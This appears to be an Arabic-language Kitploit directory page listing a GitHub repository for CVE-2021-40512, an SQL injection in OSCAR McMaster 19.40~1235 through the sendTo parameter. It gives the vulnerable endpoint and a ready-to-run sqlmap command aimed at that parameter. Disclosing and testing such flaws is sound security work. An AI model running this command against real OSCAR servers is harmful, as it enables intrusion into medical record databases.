Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40512 — CVE-2021-40512 ثغرة حقن SQL في OSCAR McMaster 19.40~1235. | Kitploit
أدوات/GitHubGitHub/war4uthor/cve-2021-40512
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubwar4uthor/cve-2021-40512

CVE-2021-40512

CVE-2021-40512 ثغرة حقن SQL في OSCAR McMaster 19.40~1235.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-40512 OSCAR McMaster 19.40~1235 ثغرة حقن SQL

توجد ثغرة حقن SQL في الإصدار 19.40~1235 من OSCAR McMaster. يمكن لمهاجم خبيث إصدار أوامر SQL إلى قاعدة بيانات MySQL/MariaDB من خلال المعامل sendTo القابل للاستغلال والموجود على نقطة النهاية /oscar/oscarEncounter/ViewConsultation.do.

[عنصر نائب لـ cve.mitre]

[عنصر نائب لـ nist]

صفحة JSP القابلة للاستغلال:

ViewConsultation.do - معامل sendTo

الحمولة القابلة للاستغلال:

sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0&currentTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner

اكتشفها Jack McBride، أغسطس 2021

تنزيل الأداة